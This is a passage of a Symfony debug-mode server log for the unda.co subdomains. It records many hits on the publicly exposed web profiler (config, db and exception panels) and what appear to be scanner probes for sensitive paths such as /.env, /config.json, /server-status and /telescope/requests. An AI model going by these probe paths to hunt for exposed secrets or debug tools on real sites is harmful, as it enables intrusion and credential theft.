  2809. [2025-12-17 22:02:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2810. [2025-12-17 22:04:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"411235","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/411235?panel=events","method":"GET"} []
  2811. [2025-12-17 22:04:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  2812. [2025-12-17 22:04:29] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2813. [2025-12-17 22:04:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2814. [2025-12-17 22:04:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2815. [2025-12-17 22:04:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2816. [2025-12-17 22:04:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2817. [2025-12-17 22:04:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2818. [2025-12-17 22:04:29] security.DEBUG: Calling Authentication entry point. [] []
  2819. [2025-12-17 22:04:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  2820. [2025-12-17 22:08:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2821. [2025-12-17 22:09:06] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"b86c15","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/b86c15","method":"GET"} []
  2822. [2025-12-17 22:12:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
  2823. [2025-12-17 22:12:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  2824. [2025-12-17 22:12:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=time","method":"GET"} []
  2825. [2025-12-17 22:12:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2826. [2025-12-17 22:14:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7edbd1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7edbd1?panel=validator","method":"GET"} []
  2827. [2025-12-17 22:14:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  2828. [2025-12-17 22:23:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=config","method":"GET"} []
  2829. [2025-12-17 22:23:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2830. [2025-12-17 22:24:09] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"7b38c1","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/7b38c1","method":"GET"} []
  2831. [2025-12-17 22:29:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FAuthenticatedVoter.php&line=26","method":"GET"} []
  2832. [2025-12-17 22:29:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"039982","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/039982?group=1&panel=db","method":"GET"} []
  2833. [2025-12-17 22:29:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  2834. [2025-12-17 22:34:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2835. [2025-12-17 22:35:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=cache","method":"GET"} []
  2836. [2025-12-17 22:35:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2837. [2025-12-17 22:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9727b6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9727b6?panel=config","method":"GET"} []
  2838. [2025-12-17 22:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2839. [2025-12-17 22:45:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=logger","method":"GET"} []
  2840. [2025-12-17 22:45:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  2841. [2025-12-17 22:45:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e","method":"GET"} []
  2842. [2025-12-17 22:45:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2843. [2025-12-17 22:56:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=twig","method":"GET"} []
  2844. [2025-12-17 22:56:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2845. [2025-12-17 23:02:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=request","method":"GET"} []
  2846. [2025-12-17 23:02:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2847. [2025-12-17 23:05:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=db","method":"GET"} []
  2848. [2025-12-17 23:05:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2849. [2025-12-17 23:10:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2850. [2025-12-17 23:10:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=request","method":"GET"} []
  2851. [2025-12-17 23:10:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2852. [2025-12-17 23:14:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=events","method":"GET"} []
  2853. [2025-12-17 23:14:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  2854. [2025-12-17 23:15:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=form","method":"GET"} []
  2855. [2025-12-17 23:15:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  2856. [2025-12-17 23:18:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a7fe89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a7fe89?panel=dump","method":"GET"} []
  2857. [2025-12-17 23:18:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  2858. [2025-12-17 23:27:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e3caa0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e3caa0","method":"GET"} []
  2859. [2025-12-17 23:27:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2860. [2025-12-17 23:28:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest","method":"GET"} []
  2861. [2025-12-17 23:28:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2862. [2025-12-17 23:34:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /atom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /atom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2863. [2025-12-17 23:40:32] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  2864. [2025-12-17 23:40:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2865. [2025-12-17 23:40:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2866. [2025-12-17 23:40:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2867. [2025-12-17 23:40:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2868. [2025-12-17 23:40:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2869. [2025-12-17 23:40:32] security.DEBUG: Calling Authentication entry point. [] []
  2870. [2025-12-17 23:41:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /remote/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /remote/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2871. [2025-12-17 23:41:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2872. [2025-12-17 23:41:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2873. [2025-12-17 23:47:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=189.172.51.0&limit=10","method":"GET"} []
  2874. [2025-12-17 23:47:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.51.0&limit=10","method":"GET"} []
  2875. [2025-12-17 23:50:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2876. [2025-12-17 23:50:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2877. [2025-12-17 23:50:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2878. [2025-12-17 23:50:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2879. [2025-12-17 23:50:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2880. [2025-12-17 23:53:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c98e4d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c98e4d?panel=form","method":"GET"} []
  2881. [2025-12-17 23:53:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  2882. [2025-12-18 00:01:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2883. [2025-12-18 00:01:55] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2884. [2025-12-18 00:01:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2885. [2025-12-18 00:01:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2886. [2025-12-18 00:01:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2887. [2025-12-18 00:01:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2888. [2025-12-18 00:01:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2889. [2025-12-18 00:01:55] security.DEBUG: Calling Authentication entry point. [] []
  2890. [2025-12-18 00:01:56] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  2891. [2025-12-18 00:02:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=exception","method":"GET"} []
  2892. [2025-12-18 00:02:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  2893. [2025-12-18 00:03:39] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2894. [2025-12-18 00:03:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2895. [2025-12-18 00:04:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2896. [2025-12-18 00:05:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2897. [2025-12-18 00:05:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2898. [2025-12-18 00:05:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2899. [2025-12-18 00:05:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2900. [2025-12-18 00:05:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2901. [2025-12-18 00:05:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2902. [2025-12-18 00:05:33] security.DEBUG: Calling Authentication entry point. [] []
  2903. [2025-12-18 00:05:37] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  2904. [2025-12-18 00:08:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=db","method":"GET"} []
  2905. [2025-12-18 00:08:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2906. [2025-12-18 00:09:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2907. [2025-12-18 00:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=db","method":"GET"} []
  2908. [2025-12-18 00:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2909. [2025-12-18 00:11:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=db","method":"GET"} []
  2910. [2025-12-18 00:11:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2911. [2025-12-18 00:13:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2912. [2025-12-18 00:14:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2913. [2025-12-18 00:14:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
